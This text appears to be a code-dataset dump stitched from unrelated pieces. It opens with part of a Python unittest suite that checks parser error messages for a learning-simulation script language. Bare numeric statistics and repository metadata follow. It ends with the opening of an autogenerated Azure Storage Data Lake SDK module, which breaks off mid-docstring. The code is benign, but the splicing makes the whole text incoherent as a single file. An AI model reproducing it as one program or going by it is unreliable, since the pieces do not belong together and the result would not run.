A e1 | x1:1, count_reset(foo), x2:2, B
B e2 | A
'''
msg = "Error on line 9: Unknown event 'foo' in count_reset."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, blaps, x2:2, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'blaps'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'x2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, e2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'e2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
@variables glob:0
@PHASE phase_label stop:e1=10
A e1 | x1:1, b2, x3:3, B
B e2 | A
'''
msg = "Error on line 9: Unknown action 'b2'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1=5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1 = 5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1 = 5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
text = params + '''
behaviors = b1
@PHASE phase_label stop:e1=10
A e1 | x1:1, x2:rand(1,3), b1 == 5: x:10, B(0.5),C(0.5)
B e2 | A
C e1 | A
@run phase_label
'''
msg = "No condition in 'x1:1, x2:rand(1,3), b1 == 5: x:10, B(0.5),C(0.5)' was met for response 'b1'."
with self.assertRaisesMsg(msg):
run(text)
class TestWithPlots(LsTestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_stopcond_stimulus(self):
text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@run phase1
@nplot s
'''
run(text)
plot_data = get_plot_data()
ns = plot_data
self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
self.assertEqual(ns['y'], [0, 1, 1, 2, 2])
def test_stopcond_phase_line_label(self):
text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:NT=2
NT s | NT
@run phase1
@nplot s
'''
run(text)
plot_data = get_plot_data()
ns = plot_data
self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
self.assertEqual(ns['y'], [0, 1, 1, 2, 2])
def test_stopcond_stimulus_with_xscale(self):
text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@run phase1
xscale: s
@nplot s
'''
run(text)
plot_data = get_plot_data()
ns = plot_data
self.assertEqual(ns['x'], [0, 1, 2])
self.assertEqual(ns['y'], [0, 1, 2])
def test_stopcond_stimulus_with_phases(self):
text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:s=2
NT s | NT
@phase phase2 stop:s=2
NT s | NT
@run phase1, phase2
phases: phase2
@nplot s
'''
run(text)
plot_data = get_plot_data()
ns = plot_data
self.assertEqual(ns['x'], [0, 1, 2, 3, 4])
self.assertEqual(ns['y'], [0, 1, 1, 2, 2])
def test_stopcond_phase_line_label_with_xscale(self):
text = '''
mechanism: sr
stimulus_elements: s
behaviors: b
@phase phase1 stop:NT=2
NT s | NT
@run phase1
xscale: NT
@nplot s
'''
msg = "xscale cannot be a phase line label in @nplot/@nexport."
with self.assertRaisesMsg(msg):
run(text)
class TestExceptions(LsTestCase):
def setUp(self):
pass
def test_no_label(self):
text = '''
@PHASE
'''
msg = "@PHASE line must have the form '@PHASE label stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, '_')
def test_wrong_stopcond(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e11=10
L1 e1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
msg = "Unknown variable 'e11'."
phase.next_stimulus(None)
with self.assertRaisesMsg(msg):
phase.next_stimulus('b1')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1
L1 e1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
msg = "Condition 'e1' is not a boolean expression."
phase.next_stimulus(None)
with self.assertRaisesMsg(msg):
phase.next_stimulus('b1')
# count is only for line actions. For stop conditions, use b1=5 instead.
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:count(b1)=5
L1 e1 | H1
H1 | L2
L2 e2 | L1
'''
phase = parse(text, 'phase_label')
msg = "Unknown variable 'count'."
phase.next_stimulus(None)
with self.assertRaisesMsg(msg):
phase.next_stimulus('b1')
def test_no_stopcond(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label
L1 e1 | L2
L2 e2 | L1
'''
msg = "@PHASE line must have the form '@PHASE label stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_empty_stopcond(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:
L1 e1 | L2
L2 e2 | L1
'''
msg = "Phase stop condition must have the form 'stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label blaps
L1 e1 | L2
L2 e2 | L1
'''
msg = "Phase stop condition must have the form 'stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stopp:e1=10
L1 e1 | L2
L2 e2 | L1
'''
msg = "Phase stop condition must have the form 'stop:condition'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_help_line_with_response(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e1=10
L1 e1 | H
H | b1:L1 | L1
'''
msg = "Condition on help line cannot depend on response."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_modify_global_variable(self):
text = '''
@variables var1:1, var2:2*var1+1
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:count(H1)=10
L1 e1 | H1
H1 var1:var1+1 | L2
L2 e2 | L1
'''
msg = "Cannot modify global variable inside a phase."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_unknown_local_variable(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var:y | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
msg = "Unknown variable 'y'."
with self.assertRaisesMsg(msg):
phase.next_stimulus(None)
def test_syntax_error_in_expression(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var: 1+/1 | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
msg = "Error in expression '1+/1': invalid syntax."
with self.assertRaisesMsg(msg):
phase.next_stimulus(None)
def test_cannot_evaluate_expression(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var: rand(1,) | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
msg = "Cannot evaluate expression 'rand(1,)': rand() missing 1 required positional argument: 'stop'."
with self.assertRaisesMsg(msg):
phase.next_stimulus(None)
def test_eval_output_not_number(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:local_var=5
L0 local_var:'foo' | L1
L1 e1 | L2
L2 e2 | H1
H1 local_var:local_var+1 | L1
'''
phase = parse(text, 'phase_label')
msg = "Error in expression ''foo''."
with self.assertRaisesMsg(msg):
phase.next_stimulus(None)
def test_invalid_count_reset(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:e2=3
L1 e1 | count(e1)=5 : H | L2
L2 e1 | L1
H count_reset(e1X) | L3
L3 e2 | L1
'''
msg = "Unknown event 'e1X' in count_reset."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_invalid_line_label_in_logic(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE phase_label stop:False # Never stop
XL1 e1 | count(b1)>=5 : H | L2
XL2 e1 | L1
XH count_reset(b1) | L3
XL3 e2 | L1
'''
msg = "Unknown action 'H'."
with self.assertRaisesMsg(msg):
parse(text, 'phase_label')
def test_phase_line_contains_only_label(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2
@PHASE thelabel stop:foo
XL1 e1 | count(b1)>=5 : H | L2
XL2
XH count_reset(b1) | L3
XL3 e2 | L1
'''
msg = "Phase line contains only label."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_phase_line_label_is_stimulus(self):
text = '''
stimulus_elements: e1, e2, FOO
behaviors: b1, b2
@PHASE thelabel stop:False
FOO e1 | count(b1)>=5 : H | L2
b1 e1
H count_reset(b1) | L3
L3 e2 | L1
'''
msg = "The phase line label 'FOO' coincides with the name of a stimulus element."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_phase_line_label_is_behavior(self):
text = '''
stimulus_elements: e1, e2, FOO
behaviors: b1, b2, BAR
@PHASE thelabel stop:False
L1 e1 | count(b1)>=5 : H | b1
b1 e1 | L1
BAR count_reset(b1) | L3
L3 e2 | L1
'''
msg = "The phase line label 'b1' coincides with the name of a behavior."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_duplicate_phase_line_label(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | H
H e1 | L1
BAR count_reset(b1) | H
L1 e2 | L1
'''
msg = "Duplicate of phase line label 'L1'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_not_parsed(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | H
H e1 | L1
BAR count_reset(b1) | H
L1 e2 | L1
'''
script = Script(text)
script.parse()
script_parser = script.script_parser
phase_obj = script_parser.phases.phases['thelabel']
with self.assertRaises(Exception):
phase_obj.next_stimulus(None)
def test_missing_separator(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 e2
'''
msg = "Missing separator '|' on phase line."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_unknown_stimulus_element_or_action(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e11 | L2
L2 e2 | L1
'''
msg = "Unknown action 'e11'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 coun_reset(e1) | L2
L2 e2 | L1
'''
msg = "Unknown action 'coun_reset(e1)'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_invalid_stimulus_element(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1,e11 | L2
L2 e2 | L1
'''
msg = "Expected a stimulus element, got 'e11'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_no_conditions(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 e2 |
'''
msg = "Line with label 'L2' has no conditions."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_unknown_event_in_count_reset(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | L2
L2 count_reset(foo) |
'''
msg = "Unknown event 'foo' in count_reset."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_no_condition_met(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop:e1==10
L1 e1 | b3=7:L2 | b2=42:L2
L2 e2 | L1
'''
phase = parse(text, 'thelabel')
stimulus = phase.next_stimulus(None)[0]
self.assertEqual(stimulus, {'e1': 1})
msg = "No condition in 'b3=7:L2 | b2=42:L2' was met for response 'b1'."
with self.assertRaisesMsg(msg):
phase.next_stimulus('b1')
text = """
mechanism: ga
stimulus_elements : lever1, lever2, lever3, reward
behaviors : R
@phase vi stop: reward=25000
FI3 lever1 | count_line()=3:ON | FI3
FI2 lever2 | count_line()=2:ON | FI2
ON lever3 | R:REWARD | ON
REWARD reward | ON(1/6),FI2(1/6),FI3(1/6)
@run vi
"""
phase = parse(text, 'vi')
stimulus = phase.next_stimulus(None)[0]
msg = "No condition in 'ON(1/6),FI2(1/6),FI3(1/6)' was met for response 'R'."
with self.assertRaisesMsg(msg):
for _ in range(100):
phase.next_stimulus('R')
def test_prob_greater_than_1(self):
text = """
mechanism: ga
stimulus_elements : lever1, lever2, lever3, reward
behaviors : R
@phase vi stop: reward=25000
FI3 lever1 | count_line()=3:ON | FI3
FI2 lever2 | count_line()=2:ON | FI2
ON lever3 | R:REWARD | ON
REWARD reward | ON(1/2),FI2(1/2),FI3(1/2)
@run vi
"""
msg = "Sum of probabilities is 1.5>1."
with self.assertRaisesMsg(msg):
run(text)
def test_condition_has_more_than_one_colon(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==1
L1 e1 | b3=1 :: L2 | L1
L2 e2 | L1
'''
msg = "Error on line 5: Invalid statement 'b3=1 :: L2'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
def test_condition_not_boolean(self):
text = '''
mechanism: sr
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | 42:L2 | L1
L2 e2 | L1
@run thelabel
'''
msg = "Condition '42' is not a boolean expression."
with self.assertRaisesMsg(msg):
run(text)
# phase = parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | e1:L2 | L1
L2 e2 | L1
'''
msg = "Variable name 'e1' equals a stimulus element name."
with self.assertRaisesMsg(msg):
phase = parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | b1:L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'thelabel')
phase.next_stimulus(None)
stimulus = phase.next_stimulus('b1')[0]
self.assertEqual(stimulus, {'e2': 1})
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | b1:L2 | L1
L2 e2 | L1
'''
phase = parse(text, 'thelabel')
phase.next_stimulus(None)
stimulus = phase.next_stimulus('b2')[0]
self.assertEqual(stimulus, {'e1': 1})
def test_invalid_condition(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2,L1 | L1
L2 e2 | L1
'''
msg = "Error on line 5: The unconditional goto row label 'L2,L1' cannot be continued."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5),L1 | L1
L2 e2 | L1
'''
msg = "Invalid condition 'L2(0.5),L1'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2((0.5)),L1(0.1) | L1
L2 e2 | L1
'''
# msg = "Unknown action 'L2((0.5)),L1(0.1)'."
msg = "Unknown action 'L2((0.5))'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2)0.5(,L1(0.1) | L1
L2 e2 | L1
'''
msg = "Unknown action 'L2)0.5('."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5), LL1(0.1) | L1
L2 e2 | L1
'''
msg = "Unknown action 'LL1(0.1)'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5), L1(1.1) | L1
L2 e2 | L1
'''
msg = "Invalid condition 'L2(0.5),L1(1.1)'. Expected a probability, got '1.1'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.2),L1(-0.9) | L1
L2 e2 | L1
'''
msg = "Invalid condition 'L2(0.2),L1(-0.9)'. Expected a probability, got '-0.9'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.5),L1(0.2),L2(0.01) | L1
L2 e2 | L1
L3 e1 | L2
'''
msg = "Invalid condition 'L2(0.5),L1(0.2),L2(0.01)'. Label 'L2' duplicated."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L22 | L1
L2 e2 | L1
'''
msg = "Unknown action 'L22'."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
text = '''
mechanism: ga
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE thelabel stop : e1==4
L1 e1 | L2(0.2),L1(0.9) | L1
L2 e2 | L1
@run thelabel
'''
msg = "Sum of probabilities is 1.1>1."
with self.assertRaisesMsg(msg):
run(text)
def test_invalid_phase_label(self):
text = '''
stimulus_elements: e1, e2
behaviors: b1, b2, b3
@PHASE 123thelabel stop : e1==4
L1 e1 | L2(0.2),L1(0.9) | L1
L2 e2 | L1
'''
msg = "Phase label '123thelabel' is not a valid identifier."
with self.assertRaisesMsg(msg):
parse(text, 'thelabel')
| 32.45573
| 121
| 0.510788
| 10,477
| 84,677
| 4.035793
| 0.03102
| 0.08656
| 0.094482
| 0.130667
| 0.924509
| 0.917153
| 0.90294
| 0.894804
| 0.880969
| 0.855781
| 0
| 0.072883
| 0.360936
| 84,677
| 2,608
| 122
| 32.468175
| 0.708486
| 0.016404
| 0
| 0.840125
| 0
| 0.019704
| 0.457262
| 0.003856
| 0
| 0
| 0
| 0
| 0.16704
| 1
| 0.037618
| false
| 0.003583
| 0.001791
| 0
| 0.042544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a53532e364f1fe58adbf6679b322f66b705fa7d
| 42,423
|
py
|
Python
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/storage-blob-preview/azext_storage_blob_preview/vendored_sdks/azure_storage_blob/v2020_02_10/_generated/aio/operations_async/_directory_operations_async.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import map_error
from ... import models
class DirectoryOperations:
"""DirectoryOperations async operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar resource: . Constant value: "directory".
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
self.resource = "directory"
async def create(self, timeout=None, directory_properties=None, posix_permissions=None, posix_umask=None, request_id=None, directory_http_headers=None, lease_access_conditions=None, modified_access_conditions=None, *, cls=None, **kwargs):
"""Create a directory. By default, the destination is overwritten and if
the destination already exists and has a lease the lease is broken.
This operation supports conditional HTTP requests. For more
information, see [Specifying Conditional Headers for Blob Service
Operations](https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations).
To fail if the destination already exists, use a conditional request
with If-None-Match: "*".
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param directory_properties: Optional. User-defined properties to be
stored with the file or directory, in the format of a comma-separated
list of name and value pairs "n1=v1, n2=v2, ...", where each value is
base64 encoded.
:type directory_properties: str
:param posix_permissions: Optional and only valid if Hierarchical
Namespace is enabled for the account. Sets POSIX access permissions
for the file owner, the file owning group, and others. Each class may
be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g.
0766) are supported.
:type posix_permissions: str
:param posix_umask: Only valid if Hierarchical Namespace is enabled
for the account. This umask restricts permission settings for file and
directory, and will only be applied when default Acl does not exist in
parent directory. If the umask bit has set, it means that the
corresponding permission will be disabled. Otherwise the corresponding
permission will be determined by the permission. A 4-digit octal
notation (e.g. 0022) is supported here. If no umask was specified, a
default umask - 0027 will be used.
:type posix_umask: str
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param directory_http_headers: Additional parameters for the operation
:type directory_http_headers:
~.models.DirectoryHttpHeaders
:param lease_access_conditions: Additional parameters for the
operation
:type lease_access_conditions:
~.models.LeaseAccessConditions
:param modified_access_conditions: Additional parameters for the
operation
:type modified_access_conditions:
~.models.ModifiedAccessConditions
:param callable cls: A custom type or function that will be passed the
direct response
:return: None or the result of cls(response)
:rtype: None
:raises:
:class:`DataLakeStorageErrorException<.models.DataLakeStorageErrorException>`
"""
error_map = kwargs.pop('error_map', None)
cache_control = None
if directory_http_headers is not None:
cache_control = directory_http_headers.cache_control
content_type = None
if directory_http_headers is not None:
content_type = directory_http_headers.content_type
content_encoding = None
if directory_http_headers is not None:
content_encoding = directory_http_headers.content_encoding
content_language = None
if directory_http_headers is not None:
content_language = directory_http_headers.content_language
content_disposition = None
if directory_http_headers is not None:
content_disposition = directory_http_headers.content_disposition
lease_id = None
if lease_access_conditions is not None:
lease_id = lease_access_conditions.lease_id
if_modified_since = None
if modified_access_conditions is not None:
if_modified_since = modified_access_conditions.if_modified_since
if_unmodified_since = None
if modified_access_conditions is not None:
if_unmodified_since = modified_access_conditions.if_unmodified_since
if_match = None
if modified_access_conditions is not None:
if_match = modified_access_conditions.if_match
if_none_match = None
if modified_access_conditions is not None:
if_none_match = modified_access_conditions.if_none_match
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
query_parameters['resource'] = self._serialize.query("self.resource", self.resource, 'str')
# Construct headers
header_parameters = {}
if directory_properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("directory_properties", directory_properties, 'str')
if posix_permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("posix_permissions", posix_permissions, 'str')
if posix_umask is not None:
header_parameters['x-ms-umask'] = self._serialize.header("posix_umask", posix_umask, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id", request_id, 'str')
if cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", cache_control, 'str')
if content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", content_type, 'str')
if content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", content_encoding, 'str')
if content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", content_language, 'str')
if content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", content_disposition, 'str')
if lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
if if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", if_modified_since, 'rfc-1123')
if if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", if_unmodified_since, 'rfc-1123')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise models.DataLakeStorageErrorException(response, self._deserialize)
if cls:
response_headers = {
'ETag': self._deserialize('str', response.headers.get('ETag')),
'Last-Modified': self._deserialize('rfc-1123', response.headers.get('Last-Modified')),
'x-ms-client-request-id': self._deserialize('str', response.headers.get('x-ms-client-request-id')),
'x-ms-request-id': self._deserialize('str', response.headers.get('x-ms-request-id')),
'x-ms-version': self._deserialize('str', response.headers.get('x-ms-version')),
'Content-Length': self._deserialize('long', response.headers.get('Content-Length')),
'Date': self._deserialize('rfc-1123', response.headers.get('Date')),
}
return cls(response, None, response_headers)
create.metadata = {'url': '/{filesystem}/{path}'}
async def rename(self, rename_source, timeout=None, marker=None, path_rename_mode=None, directory_properties=None, posix_permissions=None, posix_umask=None, source_lease_id=None, request_id=None, directory_http_headers=None, lease_access_conditions=None, modified_access_conditions=None, source_modified_access_conditions=None, *, cls=None, **kwargs):
"""Rename a directory. By default, the destination is overwritten and if
the destination already exists and has a lease the lease is broken.
This operation supports conditional HTTP requests. For more
information, see [Specifying Conditional Headers for Blob Service
Operations](https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations).
To fail if the destination already exists, use a conditional request
with If-None-Match: "*".
:param rename_source: The file or directory to be renamed. The value
must have the following format: "/{filesysystem}/{path}". If
"x-ms-properties" is specified, the properties will overwrite the
existing properties; otherwise, the existing properties will be
preserved.
:type rename_source: str
:param timeout: The timeout parameter is expressed in seconds. For
more information, see <a
href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-timeouts-for-blob-service-operations">Setting
Timeouts for Blob Service Operations.</a>
:type timeout: int
:param marker: When renaming a directory, the number of paths that are
renamed with each invocation is limited. If the number of paths to be
renamed exceeds this limit, a continuation token is returned in this
response header. When a continuation token is returned in the
response, it must be specified in a subsequent invocation of the
rename operation to continue renaming the directory.
:type marker: str
:param path_rename_mode: Determines the behavior of the rename
operation. Possible values include: 'legacy', 'posix'
:type path_rename_mode: str or
~.models.PathRenameMode
:param directory_properties: Optional. User-defined properties to be
stored with the file or directory, in the format of a comma-separated
list of name and value pairs "n1=v1, n2=v2, ...", where each value is
base64 encoded.
:type directory_properties: str
:param posix_permissions: Optional and only valid if Hierarchical
Namespace is enabled for the account. Sets POSIX access permissions
for the file owner, the file owning group, and others. Each class may
be granted read, write, or execute permission. The sticky bit is also
supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g.
0766) are supported.
:type posix_permissions: str
:param posix_umask: Only valid if Hierarchical Namespace is enabled
for the account. This umask restricts permission settings for file and
directory, and will only be applied when default Acl does not exist in
parent directory. If the umask bit has set, it means that the
corresponding permission will be disabled. Otherwise the corresponding
permission will be determined by the permission. A 4-digit octal
notation (e.g. 0022) is supported here. If no umask was specified, a
default umask - 0027 will be used.
:type posix_umask: str
:param source_lease_id: A lease ID for the source path. If specified,
the source path must have an active lease and the lease ID must match.
:type source_lease_id: str
:param request_id: Provides a client-generated, opaque value with a 1
KB character limit that is recorded in the analytics logs when storage
analytics logging is enabled.
:type request_id: str
:param directory_http_headers: Additional parameters for the operation
:type directory_http_headers:
~.models.DirectoryHttpHeaders
